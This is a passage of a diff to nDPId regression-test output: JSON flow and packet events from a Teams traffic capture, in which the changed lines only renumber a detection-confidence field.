00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041687412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687382,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041687611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687600,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1587041687745,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1587041687745,"pkt":"KDc3AG3IEBMx8Tl2CABFAADTPBBAADkRgbLAqAEBwKgBBgA19Q8AvwAAY+WBgAABAAQAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQABwAwABQABAAAGxQAfCmV1bm8tMS1hcGkOdHJhZmZpY21hbmFnZXIDbmV0AMA8AAUAAQAAABUACwhldW5vLTEtMcATwGcABQABAAAAOgApHWFtcy1ldW5vLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwFbAfgABAAEAAAAVAAQ0qbp3"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041688611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041689410} @@ -347,30 +353,30 @@ 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1587041690880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1587041690880,"pkt":"EBMx8Tl2KDc3AG3ICABFAABSJv0AAP8REUbAqAEGwKgBAfm6ADUAPoc2eGoBAAABAAAAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": 